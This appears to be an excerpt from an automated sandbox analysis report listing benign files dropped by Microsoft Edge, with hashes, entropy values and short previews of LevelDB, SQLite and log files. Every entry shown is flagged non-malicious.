                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                            Malicious:false
                                                                                                            Preview:[]
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:JSON data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40
                                                                                                            Entropy (8bit):4.1275671571169275
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                            MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                            SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                            SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                            SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                            Malicious:false
                                                                                                            Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.46731661083066856
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TL1QAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3is25q0S9K0xHZ75fOV:TLiOUOq0afDdWec9sJf5Q7J5fc
                                                                                                            MD5:E93ACF0820CA08E5A5D2D159729F70E3
                                                                                                            SHA1:2C1A4D4924B9AEC1A796F108607404B000877C5D
                                                                                                            SHA-256:F2267FDA7F45499F7A01186B75CEFB799F8D2BC97E2E9B5068952D477294302C
                                                                                                            SHA-512:3BF36C20E04DCF1C16DC794E272F82F68B0DE43F16B4A9746B63B6D6BBC953B00BD7111CDA7AFE85CEBB2C447145483A382B15E2B0A5B36026C3441635D4E50C
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):182
                                                                                                            Entropy (8bit):4.2629097520179995
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:RGXKRjg0QwVIWRKXECSAV6jDyhjgHGAW+LB2Z4MKLFE1SwhiFAfXQmWyKBPMwRgK:z3frsUpAQQgHGwB26MK8Sw06fXQmWtRT
                                                                                                            MD5:643E00B0186AA80523F8A6BED550A925
                                                                                                            SHA1:EC4056125D6F1A8890FFE01BFFC973C2F6ABD115
                                                                                                            SHA-256:A0C9ABAE18599F0A65FC654AD36251F6330794BEA66B718A09D8B297F3E38E87
                                                                                                            SHA-512:D91A934EAF7D9D669B8AD4452234DE6B23D15237CB4D251F2C78C8339CEE7B4F9BA6B8597E35FE8C81B3D6F64AE707C68FF492903C0EDC3E4BAF2C6B747E247D
                                                                                                            Malicious:false
                                                                                                            Preview:Microsoft Edge settings and storage represent user-selected preferences and information and MUST not be extracted, overwritten or modified except through Microsoft Edge defined APIs.
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:ASCII text
                                                                                                            Category:dropped
                                                                                                            Size (bytes):16
                                                                                                            Entropy (8bit):3.2743974703476995
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                            MD5:46295CAC801E5D4857D09837238A6394
                                                                                                            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                            Malicious:false
                                                                                                            Preview:MANIFEST-000001.
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):61
                                                                                                            Entropy (8bit):3.7273991737283296
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:S8ltHlS+QUl1ASEGhTFl:S85aEFl
                                                                                                            MD5:9F7EADC15E13D0608B4E4D590499AE2E
                                                                                                            SHA1:AFB27F5C20B117031328E12DD3111A7681FF8DB5
                                                                                                            SHA-256:5C3A5B578AB9FE853EAD7040BC161929EA4F6902073BA2B8BB84487622B98923
                                                                                                            SHA-512:88455784C705F565C70FA0A549C54E2492976E14643E9DD0A8E58C560D003914313DF483F096BD33EC718AEEC7667B8DE063A73627AA3436BA6E7E562E565B3F
                                                                                                            Malicious:false
                                                                                                            Preview:*...#................version.1..namespace-..&f...............
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:ASCII text
                                                                                                            Category:dropped
                                                                                                            Size (bytes):16
                                                                                                            Entropy (8bit):3.2743974703476995
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                            MD5:46295CAC801E5D4857D09837238A6394
                                                                                                            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                            Malicious:false
                                                                                                            Preview:MANIFEST-000001.
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:ASCII text
                                                                                                            Category:dropped
                                                                                                            Size (bytes):271
                                                                                                            Entropy (8bit):5.232034465378332
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:YEPec1N723fQCQM72KLlaC2ukqM+q2PN723fQCQMxIFUv:YEDatLQbukqM+vVaQFUv
                                                                                                            MD5:6AF0E8162CCCEE6D2AA1A99DE784D17E
                                                                                                            SHA1:9EAC26968CBD0788692FDE205ADF8CFFE2E6B5F1
                                                                                                            SHA-256:7EAFFC9B95C1070CAF4192CBFEB4E4B29E50EA4B4D0C092E6BB38EC91898ED23
                                                                                                            SHA-512:956259494E6F97069C01BEA113CB938104609B492ABAAF33EABBE1E49146686B8D2D2482A3BABC9280DF076F0D06BBD3F8DD267695F8581D3A83DE51BA5D478B
                                                                                                            Malicious:false
                                                                                                            Preview:2024/12/05-04:39:47.246 1b8c Creating DB C:\Users\user\AppData\Local\Temp\chr6EA4.tmp\Default\Session Storage since it was missing..2024/12/05-04:39:47.409 1b8c Reusing MANIFEST C:\Users\user\AppData\Local\Temp\chr6EA4.tmp\Default\Session Storage/MANIFEST-000001.
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:OpenPGP Secret Key
                                                                                                            Category:dropped
                                                                                                            Size (bytes):41
                                                                                                            Entropy (8bit):4.704993772857998
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                            MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                            SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                            SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                            SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                            Malicious:false
                                                                                                            Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:ASCII text
                                                                                                            Category:dropped
                                                                                                            Size (bytes):16
                                                                                                            Entropy (8bit):3.2743974703476995
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                            MD5:46295CAC801E5D4857D09837238A6394
                                                                                                            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                            Malicious:false
                                                                                                            Preview:MANIFEST-000001.
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40
                                                                                                            Entropy (8bit):3.473726825238924
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:41tt0diERGn:et084G
                                                                                                            MD5:148079685E25097536785F4536AF014B
                                                                                                            SHA1:C5FF5B1B69487A9DD4D244D11BBAFA91708C1A41
                                                                                                            SHA-256:F096BC366A931FBA656BDCD77B24AF15A5F29FC53281A727C79F82C608ECFAB8
                                                                                                            SHA-512:C2556034EA51ABFBC172EB62FF11F5AC45C317F84F39D4B9E3DDBD0190DA6EF7FA03FE63631B97AB806430442974A07F8E81B5F7DC52D9F2FCDC669ADCA8D91F
                                                                                                            Malicious:false
                                                                                                            Preview:.On.!................database_metadata.1
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:ASCII text
                                                                                                            Category:dropped
                                                                                                            Size (bytes):16
                                                                                                            Entropy (8bit):3.2743974703476995
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                            MD5:46295CAC801E5D4857D09837238A6394
                                                                                                            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                            Malicious:false
                                                                                                            Preview:MANIFEST-000001.
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:ASCII text
                                                                                                            Category:dropped
                                                                                                            Size (bytes):299
                                                                                                            Entropy (8bit):5.15352417689411
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:Y16dR1N723fQQUh2gr52KLla1yd+q2PN723fQQUh2ghZIFUv:Ygxa6hHJLQRvVa6hHh2FUv
                                                                                                            MD5:4B845BEA8F106B2BA02DB16940FB44B4
                                                                                                            SHA1:C8D4218911F5AD3C354D2A69986F8A83ADA5490B
                                                                                                            SHA-256:39D345B49B8745EC773629BAD0D8CA63E2EEE2FFB776A2F92D5AF72EE79065B6
                                                                                                            SHA-512:3EB52AD940FBA927B7BDCAD65C344E19124944D8D7E0344EF03AB92A65E865570F024F7B92B16AEEE8F5B51D5FCC62567F3AEB8C7BB8ED43329FD5F54AE187FC
                                                                                                            Malicious:false
                                                                                                            Preview:2024/12/05-04:39:46.037 1e78 Creating DB C:\Users\user\AppData\Local\Temp\chr6EA4.tmp\Default\Site Characteristics Database since it was missing..2024/12/05-04:39:46.064 1e78 Reusing MANIFEST C:\Users\user\AppData\Local\Temp\chr6EA4.tmp\Default\Site Characteristics Database/MANIFEST-000001.
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:OpenPGP Secret Key
                                                                                                            Category:dropped
                                                                                                            Size (bytes):41
                                                                                                            Entropy (8bit):4.704993772857998
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                            MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                            SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                            SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                            SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                            Malicious:false
                                                                                                            Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:data
                                                                                                            Category:modified
                                                                                                            Size (bytes):24
                                                                                                            Entropy (8bit):2.1431558784658327
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:m+l:m
                                                                                                            MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                            SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                            SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                            SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                            Malicious:false
                                                                                                            Preview:0\r..m..................
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):24
                                                                                                            Entropy (8bit):2.1431558784658327
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:m+l:m
                                                                                                            MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                            SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                            SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                            SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                            Malicious:false
                                                                                                            Preview:0\r..m..................
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:ASCII text
                                                                                                            Category:dropped
                                                                                                            Size (bytes):16
                                                                                                            Entropy (8bit):3.2743974703476995
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                            MD5:46295CAC801E5D4857D09837238A6394
                                                                                                            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                            Malicious:false
                                                                                                            Preview:MANIFEST-000001.
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):46
                                                                                                            Entropy (8bit):4.019797536844534
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:sLollttz6sjlGXU2tkn:qolXtWswXU2tkn
                                                                                                            MD5:90881C9C26F29FCA29815A08BA858544
                                                                                                            SHA1:06FEE974987B91D82C2839A4BB12991FA99E1BDD
                                                                                                            SHA-256:A2CA52E34B6138624AC2DD20349CDE28482143B837DB40A7F0FBDA023077C26A
                                                                                                            SHA-512:15F7F8197B4FC46C4C5C2570FB1F6DD73CB125F9EE53DFA67F5A0D944543C5347BDAB5CCE95E91DD6C948C9023E23C7F9D76CFF990E623178C92F8D49150A625
                                                                                                            Malicious:false
                                                                                                            Preview:...n'................_mts_schema_descriptor...
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:ASCII text
                                                                                                            Category:dropped
                                                                                                            Size (bytes):16
                                                                                                            Entropy (8bit):3.2743974703476995
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                            MD5:46295CAC801E5D4857D09837238A6394
                                                                                                            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                            Malicious:false
                                                                                                            Preview:MANIFEST-000001.
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:ASCII text
                                                                                                            Category:dropped
                                                                                                            Size (bytes):275
                                                                                                            Entropy (8bit):5.252706036253744
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:Y1+KD1N723fQ0x2KLla1y4+q2PN723fQSIFUv:YXazVLQavVacFUv
                                                                                                            MD5:91FDF89B1B48A440FAC66C7711B8CED7
                                                                                                            SHA1:6944553B27028552F55B9F992B51F9C2E3BD1472
                                                                                                            SHA-256:02810944E00E15F32B404D0EF5EDF816F190300A9072E98904A460702DB8A9E3
                                                                                                            SHA-512:9E20A2A3974F9BF82F54E591C914F04ACA797FA90B848E33B0533706C2F3B9888383571920099402BC97E46E0AF054E4ABE964599376F49706B451092637575C
                                                                                                            Malicious:false
                                                                                                            Preview:2024/12/05-04:39:46.001 1e78 Creating DB C:\Users\user\AppData\Local\Temp\chr6EA4.tmp\Default\Sync Data\LevelDB since it was missing..2024/12/05-04:39:46.025 1e78 Reusing MANIFEST C:\Users\user\AppData\Local\Temp\chr6EA4.tmp\Default\Sync Data\LevelDB/MANIFEST-000001.
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:OpenPGP Secret Key
                                                                                                            Category:dropped
                                                                                                            Size (bytes):41
                                                                                                            Entropy (8bit):4.704993772857998
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                            MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                            SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                            SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                            SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                            Malicious:false
                                                                                                            Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.3528485475628876
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TLiN6CZhDu6MvDOF5yEHFxOUwa5qguYZ75fOSiPe2d:TLiwCZwE8I6Uwcco5fBtC
                                                                                                            MD5:F2B4FB2D384AA4E4D6F4AEB0BBA217DC
                                                                                                            SHA1:2CD70CFB3CE72D9B079170C360C1F563B6BF150E
                                                                                                            SHA-256:1ECC07CD1D383472DAD33D2A5766625009EA5EACBAEDE2417ADA1842654CBBC8
                                                                                                            SHA-512:48D03991660FA1598B3E002F5BC5F0F05E9696BCB2289240FA8CCBB2C030CDD23245D4ECC0C64DA1E7C54B092C3E60AE0427358F63087018BF0E6CEDC471DD34
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g.....4....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):131072
                                                                                                            Entropy (8bit):0.002110589502647469
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:ImtVTRPll:IiVl
                                                                                                            MD5:1AE85BB1BC8F8D5984E8ABE7CE20A767
                                                                                                            SHA1:9B23CFB09DD220970F46D9C882574FCC0FB9D908
                                                                                                            SHA-256:B3EB092F645CEA8E1367EB17A8FF5D478027858623561E10FA326816ECA325B4
                                                                                                            SHA-512:515E61BA2EB8AC230C8D465A497F6D404346A22875FDEE74450D982D788BFDE47A11EF0CE80699ABF3C200884A94953878F2F77B2D87D0C5975345E248D28637
                                                                                                            Malicious:false
                                                                                                            Preview:VLnk.....?......i.`l,...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 87, cookie 0x36, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):178176
                                                                                                            Entropy (8bit):0.9433219984290606
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:Drb2qAdB9TbTbuDDsnxCkvSAzWn0lKOMq+Jw:D/2qOB1nxCkvSACnqKOMq+y
                                                                                                            MD5:9F46CDD267F3762473D94A68E93602A8
                                                                                                            SHA1:3508D5622E6F713CEBEF50E29225AB704893339F
                                                                                                            SHA-256:ED08B3C6767787F7B2132116CEEC7E735D2172657DEF1380344F89A0B8AF6EDD
                                                                                                            SHA-512:E565B009799BD5E219E56FB02331452186A26D9EFC87F176AD9E5B52521E5F3741E45A5E4C3E413DDF1FEDAEBC59FA99918D5DD081AA7F2AFCAD328B96884D7C
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......W...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):2568
                                                                                                            Entropy (8bit):0.06569804787746028
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:K/oHl1lOtlUn:K/KNn
                                                                                                            MD5:EABA7854EB8C02AB04E2EE27E8FFB73B
                                                                                                            SHA1:2FEA9E88AB69CE42F9E0B7E81ADB100C3CBCA5A4
                                                                                                            SHA-256:35F9075E1E983B268220B680D064DAB1FD4FC0161085A3715B633B2BAC59001F
                                                                                                            SHA-512:6D34725FC2775465E2FB95CC07A89169C8040632E79980129D4A1EE269E0A11B11E1990CAA0BE713926177F8298E253F1B8EAC4DA932D3F4A4CCCB0E5131E86D
                                                                                                            Malicious:false
                                                                                                            Preview:.............Z.&...W....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:very short file (no magic)
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1
                                                                                                            Entropy (8bit):0.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:L:L
                                                                                                            MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                            SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                            SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                            SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                            Malicious:false
                                                                                                            Preview:.
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:ASCII text, with very long lines (3852), with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):11417
                                                                                                            Entropy (8bit):5.237554345326078
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:dH4vrmORnBtW4PoiUDNaxvR5FCHFcoaSbqGEDu:dH4vrmonPW4jR3GaSbqGEDu
                                                                                                            MD5:DF790948C5A7B5DD19D033FE6C793868
                                                                                                            SHA1:0C4A681E07505CA84997CE78FEEE1F0D88CB8E2A
                                                                                                            SHA-256:CB4049061A6A78013D20CC4AB396BEF4F6C35306887BE76765EED4E51EEE702D
                                                                                                            SHA-512:251C3B5DE5452E2F40C648BDB2E3D1CE2315DD4DFFAF4B4E5E08528DBAAB80535F1A82E183A65AB7DCA0C2926AE5D6B61F06DB390D0E3B8D8E77E826B21042CB
                                                                                                            Malicious:false
                                                                                                            Preview:{.. "ArbitrationSignal": "(time_elapsed_since_last_notification)-3600^(notification_quick_dismiss_rate_lower_ci+notification_disable_rate+notification_snooze_rate)",.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f41
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:very short file (no magic)
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1
                                                                                                            Entropy (8bit):0.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:L:L
                                                                                                            MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                            SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                            SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                            SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                            Malicious:false
                                                                                                            Preview:.
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:ASCII text
                                                                                                            Category:dropped
                                                                                                            Size (bytes):16
                                                                                                            Entropy (8bit):3.2743974703476995
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                            MD5:46295CAC801E5D4857D09837238A6394
                                                                                                            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                            Malicious:false
                                                                                                            Preview:MANIFEST-000001.
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:ASCII text
                                                                                                            Category:dropped
                                                                                                            Size (bytes):16
                                                                                                            Entropy (8bit):3.2743974703476995
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                            MD5:46295CAC801E5D4857D09837238A6394
                                                                                                            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                            Malicious:false
                                                                                                            Preview:MANIFEST-000001.
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:ASCII text
                                                                                                            Category:dropped
                                                                                                            Size (bytes):135
                                                                                                            Entropy (8bit):5.1021887945076285
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:tRmB+u0LRoj2bnF5ON+E2J5xAIQerrxXaXKLv:YCA1N723fQkrl2KLv
                                                                                                            MD5:A21A6AF85DD496073D4122F7123BE75B
                                                                                                            SHA1:FD656439A83BB9D0D9B6F19C06EDD89109F13BC0
                                                                                                            SHA-256:3A5D45CFD605E96E7AA38B8CE18AD2D4A86D4EE22CDD6F07E1943C324833B19C
